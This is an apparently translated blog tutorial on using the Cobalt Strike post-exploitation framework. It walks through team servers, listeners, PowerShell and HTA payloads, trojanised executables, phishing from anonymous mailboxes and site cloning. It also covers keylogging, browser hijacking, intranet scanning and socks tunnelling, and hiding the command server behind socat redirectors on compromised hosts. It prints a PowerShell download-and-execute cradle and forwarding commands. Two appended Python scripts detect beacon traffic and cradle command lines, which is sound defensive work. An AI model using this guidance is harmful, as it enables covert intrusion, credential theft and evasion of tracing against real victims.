Cobalt Strike quick start [one]

Posted by barello at 2020-03-29
0x01 About Cobalt Strike

An excellent post-exploitation platform. If it feels hard to use, the only reason is probably that we have not yet dug out many of its features ourselves: what we don't know how to use naturally feels bad to use.

The tool is Java-based, and most of its functions are practical improvements on existing techniques, which makes it well suited to cooperative operations within a team.

For more details, refer to the official website; no more verbosity here. In everything below the tool is abbreviated as 'CS'.

0x02 Basic environment introduction:

Kali, the actual control terminal, IP: 192.168.1.144

Ubuntu 16.04 VPS with its own public IP: 53.3.3.6

Win2008r2 target machine, IP: 192.168.1.191

CentOS 6.9 compromised host (broiler), IP: 192.168.1.199

Win7cn, another compromised host, IP: 192.168.1.123

0x03 Let's quickly preview some basic CS modules and their specific purposes:

Team server

Its main purpose is to let every member of a penetration team share all penetration information in time, strengthening communication and cooperation between members and so improving penetration efficiency.

In other words, under normal circumstances a team only needs to set up one team server; every member logs in to it with their own CS client and cooperative operation is easily achieved.

Of course, in practice, to keep access to the target machine for as long as possible, we habitually stand up several more team servers as a precaution against unexpected situations.

In addition, the team server is best run on Linux [the team server in this demonstration runs Ubuntu 16.04].

# ./teamserver <team server IP> <team server password> [configuration file, generally default] [yyyy-mm-dd]

The password set here is the one other members must use to connect.

# ./teamserver 53.3.3.6 klion

To illustrate the effect better, we simulate two different clients logging in to the same team server at the same time. First, run the client on the local machine and log in to the team server. After the client starts you are prompted for the team server's IP, port and password; the user name can be anything.


# ./cobaltstrike

Then open the client on another Kali machine and log in to the same team server. The final effect is shown below. Team members can chat with each other through the Event Log, and can also see at any time, in detail, what the other members have done, which is very intuitive:


# ./cobaltstrike

The various listeners in CS

The function of a listener is actually very simple: it mainly receives the various data returned by the payload.

For example, after the target machine executes our payload, the payload connects back to the listener, then downloads and executes the real shellcode; this is basically the same as the handler in MSF.

CS has two kinds of listeners: beacon and foreign.

Beacon is CS's built-in listener. That is, when we successfully execute the payload on the target system, a beacon shell is bounced back to CS. The communication protocols the shell supports are mainly DNS, HTTPS, HTTP and SMB [named pipe]. The beacon shell also has many built-in functions, which we will cover in detail later.

Foreign is mainly used to provide external listeners. For example, if you want CS to spawn a Meterpreter shell back to MSF to continue intranet penetration, you choose the foreign listener.

Let's briefly demonstrate how to quickly create a listener. The steps are as follows:

Click the Cobalt Strike menu in the upper left corner

-> Choose Listeners

-> Click the Add button; the listener configuration box pops up automatically

-> Set the IP [in fact a domain name is better (DNS tunnel)], the port and the payload type, then create it. From then on the team server keeps listening, waiting for the beacon shell to connect

With the listener in place, let's finally talk about the payload.

Put plainly, the payload is a trojan downloader. When the target triggers the payload, it automatically downloads the shellcode [which is actually the code of the beacon shell] to the target system and runs it, finally bouncing the target system's beacon shell back to us.

As for the commands executed in the beacon shell, they are all executed as scheduled tasks: the controlled end automatically downloads the queued commands from the control end at the predetermined interval and executes them in the target system in turn.

First, let's simply create a payload, throw it directly into the target system and execute it, and see what the actual result looks like when it comes online. Note that sessions marked with a red lightning icon have obtained the highest system privileges, while those without are basically running with lower privileges for the time being.

0x04 Client-side attack options. First, try the 'System Profiler' module to collect all kinds of information about the target machine: which version of the operating system it runs, which browser and its exact version, whether Flash is installed and which version [lower versions can be targeted with drive-by exploits], and whether the target's intranet IP range is visible, which gives a rough estimate of how big the target intranet is. With this basic information we can craft and send phishing emails later. In fact, a domain name is better here; an IP is used only because this is an experiment. When sending emails, it is better to use HTML to disguise the link as a plausible one. Crafting and sending emails is a separate 'professional' skill; with my limited ability it is not covered here, hehe. Let's just have a brief look at the actual effect.

Use the 'HTA payload' together with the 'file download' module to send various phishing links to the target. First create an HTA payload. This payload currently only supports three executable formats: EXE, PowerShell and VBA (macro). In practice PowerShell is recommended: its success rate is relatively high, it has quite a few advantages, it evades AV and it is flexible.


http://53.3.3.6:80/download/plugins.hta

Generate shellcode in various languages such as C, C#, Java, Python, PowerShell, Ruby and raw. CS also provides an option that can be used directly with Veil. Here we take the most practical one, PowerShell, as an example. After generating it, try to load the script on the target system. Here it is loaded directly in the target's CMD; in practice you can separate this code and put it anywhere that can execute PS.


# powershell -exec bypass -Command "& {Import-Module 'C:\payload.ps1'}"

Try phishing with an Office macro. Doing this directly is not recommended, because Office does not enable macros by default. However, you can try some relatively new Office 0-days that have recently come out. Note that when using Office you should disable macros without a digital signature and not trust VBA.

Try embedding the payload into a normal EXE. The EXE's icon may change after bundling; you can extract the original putty.exe icon and put it back, and if handled well it is not a big problem. As can be clearly seen in the figure below, when the normal program runs, our payload also runs [in fact the payload runs first].

To generate a traditional USB auto-run payload you need to supply a payload [it can be generated directly with CS, but that one is not AV-evading; it is better to use a trojan you have processed yourself]. That said, it only works on systems before XP and is basically useless on Win7 and later, so its usability is poor and we won't go into detail here.

Generating a regular EXE payload is very simple: specify which listener to attach it to, save it under a name with a high hit rate, then put the generated executable on the target machine and run it. Very simple, no more verbosity.

Clone the targeted website: provide the site you want to clone, pair it with your own URL [imitate the target as closely as possible], and attach the payload you want to execute. The payload here can be generated directly with MSF, or with HTA as I do. Of course, in reality the payload must be carefully handled; opportunities don't come easily and the target won't be fooled easily. In fact it is better to use HTML to make the URL look more realistic.

'PowerShell web delivery' may be the most commonly used module. It is equivalent to the web delivery module in MSF: it generates a piece of shellcode and provides you with a downloader, which you can then plant anywhere that can run PowerShell and reach the Internet normally, for example in a CHM file or a shortcut. Because this is just an experiment, I simply threw it into the target system's CMD to execute.

To send phishing emails, first put all the target mailboxes in a file [note, one per line], then find an email ready to be used for phishing [view the original and paste the whole HTML in]. After writing the email, remember to preview it first to see the actual effect, then configure the public mail server used to send it. I originally wanted to send it through a standard-protocol mail server, but later saw the official docs say ordinary IMAP, POP3 and SMTP are temporarily not supported because of encryption. I won't demonstrate it here; it is very simple, and you can message me privately if you don't understand. In addition, in practice you had better send from the various anonymous mailboxes you have at hand [as long as you don't disclose private information it cannot easily be traced back to your own mailboxes], which is very important. Remember that. The picture seems to have been pasted wrong, sweat. You know what I mean.

Regular Java attacks have version restrictions and require buying a certificate. In actual penetration the previous methods are basically enough, so we won't focus on them here.

0x05 Through the methods above, I believe you have a beacon shell by now. Let's explain in detail the basic use of the beacon shell itself [the post-exploitation stage]. First, assume we have a beacon shell that has not yet bypassed UAC to gain administrator privileges, and carry out the following basic operations. It should be explained in advance that CS does not support Chinese well; if the target is a Chinese system, garbled text is certain.

help: view the help for all the beacon shell's built-in commands. To view the usage of a specific command, eg: help checkin

note: attach a name to the current machine, eg: note beacon shell

cd: switch directories in the target system. Note that on Windows use double backslashes or '/', eg: cd C:\\

mkdir: create a directory, eg: mkdir D:\\beacon

rm: delete a file or directory, eg: rm D:\\beacon

upload: upload a file to the target system

download: download the specified file from the target system, eg: download C:\\users\\win7cn\\desktop\\putty.exe

cancel: cancel a download task. For example, a very large file may take a long time to download; if you don't want to continue midway, cancel it with this

shell: execute the specified CMD command in the target system, eg: shell whoami

getuid: view the user privileges of the current beacon session in the target system, to judge whether you need to bypass UAC or escalate privileges

pwd: view the current path in the target system

ls: list all files and directories in the current directory

drives: list all partitions of the target system [drive letters on Windows]

ps: view the current list of all processes in the target system

kill: kill the specified process, eg: kill 4653

sleep: specify the sleep time of the controlled end. By default it checks in every 60 seconds; sleep 10 makes the controlled end download tasks every 10 seconds. In practice the frequency should not be too fast, or it is easily noticed; about 80 seconds is enough

jobs: list all tasks. Some tasks may take a little longer to execute; here you can see the specific task ID from the list and clear it specifically

jobkill: if a task has not completed for a long time or is abnormal, use this command to end it directly, eg: jobkill 1345

clear: clear the task queue inside the beacon

checkin: force the controlled end to connect back once

exit: terminate the current beacon session

Ctrl + K: clear the screen
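The sleep/checkin behaviour described above is also what gives a beacon away on the network side: a host that talks to one server at a near-constant interval stands out in proxy logs. The following is an added detection example, not Cobalt Strike's or the author's code; the proxy log format, timestamps and hosts are constructed for the demonstration, and the interval test (coefficient of variation of the gaps between requests) is the assumed heuristic.

```python
"""Periodic-beacon detection over constructed web-proxy log lines."""
from collections import defaultdict
from datetime import datetime
from statistics import mean, pstdev

# Constructed proxy lines: "<timestamp> <client> <server:port> <method> <path>".
# 192.168.1.191 checks in roughly every 60 s (default beacon sleep); the other
# client browses at irregular, human-like intervals.
PROXY_LOG = """\
2020-03-29T10:00:00 192.168.1.191 53.3.3.6:80 GET /pixel.gif
2020-03-29T10:00:03 192.168.1.123 10.0.0.5:80 GET /index.html
2020-03-29T10:01:01 192.168.1.191 53.3.3.6:80 GET /pixel.gif
2020-03-29T10:01:47 192.168.1.123 10.0.0.5:80 GET /news.html
2020-03-29T10:02:00 192.168.1.191 53.3.3.6:80 GET /pixel.gif
2020-03-29T10:02:59 192.168.1.191 53.3.3.6:80 GET /pixel.gif
2020-03-29T10:03:12 192.168.1.123 10.0.0.5:80 GET /about.html
2020-03-29T10:04:01 192.168.1.191 53.3.3.6:80 GET /pixel.gif
2020-03-29T10:05:00 192.168.1.191 53.3.3.6:80 GET /pixel.gif
2020-03-29T10:08:40 192.168.1.123 10.0.0.5:80 GET /login
"""


def parse_lines(text):
    """Yield (timestamp, client, server) tuples from the constructed format."""
    for line in text.splitlines():
        ts, client, server, _method, _path = line.split(maxsplit=4)
        yield datetime.fromisoformat(ts), client, server


def interval_stats(text):
    """Return {(client, server): (hits, mean_gap_seconds, cv)} per flow.

    cv is the coefficient of variation (population stdev / mean) of the gaps
    between consecutive requests; a constant sleep gives a cv near zero.
    """
    times = defaultdict(list)
    for ts, client, server in parse_lines(text):
        times[(client, server)].append(ts)
    stats = {}
    for flow, stamps in times.items():
        stamps.sort()
        gaps = [(b - a).total_seconds() for a, b in zip(stamps, stamps[1:])]
        if len(gaps) < 2:
            continue  # not enough samples to say anything about regularity
        avg = mean(gaps)
        cv = pstdev(gaps) / avg if avg else 0.0
        stats[flow] = (len(stamps), avg, cv)
    return stats


def find_beacons(text, min_hits=5, max_cv=0.2):
    """Flag flows with enough hits and a near-constant request interval."""
    return sorted(flow for flow, (hits, _avg, cv) in interval_stats(text).items()
                  if hits >= min_hits and cv <= max_cv)


if __name__ == "__main__":
    for flow, (hits, avg, cv) in interval_stats(PROXY_LOG).items():
        print(f"{flow[0]} -> {flow[1]}: {hits} hits, mean {avg:.1f}s, cv {cv:.2f}")
    print("beacon-like flows:", find_beacons(PROXY_LOG))
```

A real beacon with jitter configured raises the cv, so the threshold has to be tuned against the environment's normal traffic rather than fixed at 0.2.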

0x06 Collect all kinds of information on the target machine [some of these may trigger sensitive APIs and cause protection alarms; in addition, the controlled end may noticeably freeze during process injection, and the tool still has many imperfections]:


Plant a regular keylogger in the target system, eg: keylogger 1796 x86


Try to capture the screen of the target system, which may cause obvious lag on the target, eg: screenshot 1796 x86 10 [capture for 10 seconds]

Using the browser pivot, hijack the target browser's process and forward its traffic to a specified port; we then browse through that port, which is equivalent to browsing inside the target's browser.

For example, we may find from screenshots that he logs in to a site requiring an account and password; through the browser pivot I can log in directly to that site without a password. I have poor expression ability, but I believe everyone understands me.

The official docs say IE is too laggy and unstable and the success rate is about half and half. It is estimated that dumping the process data is the reason; the dump may cause the target browser to freeze briefly.

But I have to say the idea is still very good. It's just that what the function currently does [here I worship the author, big praise] is not very perfect. You can try it if you have no other way.

browserpivot 1460 x86

browserpivot stop

In fact, for real intra-domain penetration we can't do this for the time being; we will discuss it separately later.

kerberos_ccache_use: import a ticket from a ccache file

kerberos_ticket_purge: clear the tickets of the current shell

kerberos_ticket_use: import a ticket from a ticket file

0x07 Enhance the practicality of CS with various PowerShell penetration frameworks such as Nishang, Empire, PowerSploit, PowerUp and Sherlock for privilege escalation, UAC bypass, DLL injection, hash dumping, PTH and so on. They are all much alike: the core is in those scripts. For the specific usage of each PowerShell framework, please see the related articles on this blog; there is no individual demonstration here, just the usage. Of course, the beacon shell itself provides similar functions, which I did not mention, but in fact they may not be enough and the tool's own implementation is not very good. Therefore it is recommended that you use PowerShell wherever possible, especially in Windows intranet penetration. The first way is to import an external PS script into the remote machine from the beacon shell:

powershell-import /root/Desktop/Get-Information.ps1

powershell Get-Information

The second way is to execute PowerShell code directly in the beacon shell:


powerpick Get-Host

0x08 Use CS to flexibly penetrate the target intranet

Carry out a regular port scan on the intranet where the target machine is located: specify the IP range, the protocol used for scanning [only ARP, ICMP and TCP are supported for now] and the number of threads [remember not to set it too high in practice]:


portscan 192.168.1.0/24 1-6000 arp 10

The beacon shell's built-in port forwarding transfers a port of this machine to a port of a specified machine on the public network or the intranet. In actual use it is really slow and often breaks, reason unknown:

rportfwd 389 192.168.1.181 3389

rportfwd stop 389

Let CS and MSF interact: open a socks4a proxy on the target machine for further intranet penetration.

First, use various socks proxy clients to bring the various penetration tools directly into the target intranet:


beacon> socks 1234

# vi /etc/proxychains.conf

socks4 53.3.3.6 1234

socks stop

Second, bring the whole of MSF into the target intranet through the tunnel:


setg Proxies socks4:53.3.3.6:1234

Connect to a Linux machine in the intranet from the beacon shell:


ssh 192.168.1.199:22 root admin

The process is very simple. First do port forwarding on the team server, then create a foreign listener whose port and IP are those of the machine running the beacon shell, then 'spawn' in the corresponding beacon shell and select the newly created foreign listener. There are still some problems that have not been solved well for now; I'll discuss them separately later.

As for how to use MSF to bounce back a beacon shell, there are many ways. The easiest is to execute the beacon payload's code directly. I forgot to take a screenshot, sweat; I'll add it later.

0x09 Use regular port forwarding to hide your team server as much as possible

Sometimes, to confuse the other side and prevent them from quickly tracing us, we may add some jump boxes in the middle to hide the real location of our team server as much as possible. Doing this is actually very simple.

Put plainly, it is port forwarding [aka redirection]. Of course, this port forwarding must be done on compromised hosts you already have [again, on the importance of anonymity].

If you are not reassured, you can also try multi-level forwarding on several compromised hosts at once [that is, add more layers of jump boxes], to confuse the other side and increase the difficulty of tracing. That is one use.

There are also machines in the target intranet that cannot connect to the public network directly; they can only reach other intranet machines, but we still want those machines to come online normally.

This is where the port forwarding we are about to discuss comes in. As for the specific tools, there are many; however, it is recommended that you first choose the system's own tools, such as netsh, iptables and socat.


Likewise, we'll use socat to demonstrate how to hide our team server as far as possible. The same applies to intranet machines without Internet access.

First, log in to our team server with the CS client in Kali and create a normal port 80 listener. The callback IP here temporarily uses the real IP of the VPS [in practice, use a domain name, which is very important], as follows.

Then SSH to the compromised host and start forwarding with socat. The following command transfers the traffic arriving on its external port 80 to the VPS's public port 80. After that, the host's local port 80 stays in the listening state; as soon as traffic hits port 80 it is automatically forwarded to port 80 of the VPS, which is exactly our listener port. I believe you understand.


# socat tcp-listen:80,reuseaddr,fork tcp:53.3.3.6:80 &

Now go back to the CS client and create a PowerShell payload. Note, as we said earlier, that this is just a PowerShell downloader whose main job is to download the real shellcode. Remember to change the IP address below to the IP of the compromised host [because I'm simulating the host here it is an intranet IP; in practice it must be a public IP or domain name], because our ultimate goal is to have that host forward to our real team server and so hide it as much as possible.

Note that after the default generation the address is the one resolved by our own team server; we must manually change it to the compromised host's domain name or IP. In this way the download request goes to that host first, and since forwarding is already set up there, the shellcode is finally downloaded from our team server successfully. I'm useless, I didn't even take screenshots of all of it. Anyway, the VPS is about to expire and I'm used to guerrilla fighting, haha.


# powershell.exe -nop -w hidden -c "IEX ((new-object net.webclient).downloadstring('http:

Finally, we see the target come online in the same way. As for bringing target-intranet machines that cannot reach the Internet online, it is exactly the same: point the payload's callback at any machine that can reach the Internet normally, then on that machine forward the incoming traffic to our team server. In this way, intranet machines without Internet access can also come online normally.

0x10 An in-depth understanding of the DNS tunnel communication and SMB beacon communication process, which may be one of the core parts of the whole tool, will be discussed separately at length in the future.

0x11 As for the awesome report generation function, let's not go into it. It supports one-click export to PDF, and all the operation record data from the actual penetration process is saved in the specified directory. You can study it yourself if interested; it is relatively simple and not our focus here, so no details.

A little summary: as you can see, the tool itself is very easy to use. It is purely graphical, and with a little basic knowledge you can get started very quickly. It also directly supports flexible drag and drop of icons, which is very convenient and friendly for centralized batch operation of designated compromised hosts. In fact, the combination of MSF and CS for intranet penetration is undoubtedly excellent for the time being. The real difficulty lies in understanding the communication process of the beacon shell over the different protocols, which is also the most valuable part of the whole tool. To be honest, many questions about the internal communication details still bother me. I always think CS itself is a very beautiful learning sample; there is too much in it worth digging into and settling, but it is not something one person can finish. I believe everyone is the same as me and will not be satisfied with the basic use of tools; in fact we all know there will be no substantial progress that way, and there is not much time to waste, so I am very much looking forward to in-depth exchanges with you. By the way, CS 3.8 has been out for some time. If you want to taste it, you can try it; extending the trial period is done the old way.
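The PowerShell downloader shown above, and the `-exec bypass -Command "& {Import-Module ...}"` loader from section 0x04, are what a defender sees in process-creation logs on the target. The following is an added example, not Cobalt Strike's or the author's code: it scores command lines for the cradle tokens both of the page's one-liners use. The log records, host names and the indicator weights are constructed assumptions, and the URL is a placeholder.

```python
"""Flag PowerShell download-cradle command lines in constructed process logs."""
import re

# (name, case-insensitive regex, weight); weights are an assumed scoring.
INDICATORS = [
    ("noprofile",      r"-no(p|profile)\b",                      1),
    ("hidden_window",  r"-w(indowstyle)?\s+hidden\b",            1),
    ("iex",            r"\b(iex|invoke-expression)\b",           2),
    ("webclient",      r"new-object\s+(system\.)?net\.webclient", 2),
    ("downloadstring", r"\.download(string|file)\(",             2),
    ("exec_bypass",    r"-exec(utionpolicy)?\s+bypass\b",        1),
    ("http_url",       r"https?://",                             1),
]
COMPILED = [(n, re.compile(p, re.IGNORECASE), w) for n, p, w in INDICATORS]

# Constructed process-creation records: "<time> <host> <user> CommandLine=<cmd>".
PROC_LOG = [
    '2020-03-29T11:02:10 WIN7CN win7cn CommandLine=powershell.exe -nop -w hidden '
    '-c "IEX ((new-object net.webclient).downloadstring(\'http://REDIRECTOR-PLACEHOLDER/a\'))"',
    '2020-03-29T11:05:41 WIN2008R2 admin CommandLine=powershell -exec bypass '
    '-Command "& {Import-Module \'C:\\payload.ps1\'}"',
    '2020-03-29T11:07:03 WIN7CN win7cn CommandLine=powershell.exe Get-Process | '
    'Out-File C:\\temp\\procs.txt',
    '2020-03-29T11:09:55 WIN2008R2 admin CommandLine=powershell.exe -NoProfile '
    '-File C:\\scripts\\backup.ps1',
]


def score_command(cmd):
    """Return (score, matched indicator names) for one command line."""
    hits = [name for name, rx, _w in COMPILED if rx.search(cmd)]
    score = sum(w for name, _rx, w in COMPILED if name in hits)
    return score, hits


def parse_record(line):
    """Split a constructed record into (time, host, user, command)."""
    head, cmd = line.split("CommandLine=", 1)
    time, host, user = head.split()
    return time, host, user, cmd


def find_cradles(lines, threshold=3):
    """Return [(host, user, score, hits)] for records at or above threshold.

    A lone weak indicator (-NoProfile, -exec bypass) is normal admin usage and
    scores below the threshold; the web-delivery one-liner stacks several.
    """
    out = []
    for line in lines:
        _t, host, user, cmd = parse_record(line)
        score, hits = score_command(cmd)
        if score >= threshold:
            out.append((host, user, score, hits))
    return out


if __name__ == "__main__":
    for host, user, score, hits in find_cradles(PROC_LOG):
        print(f"{host}\\{user}: score {score}, indicators {hits}")
```

The `-exec bypass` loader on its own scores too low to alert here; catching it needs correlation with the file write of `C:\payload.ps1` or the subsequent beacon traffic, which this block does not attempt.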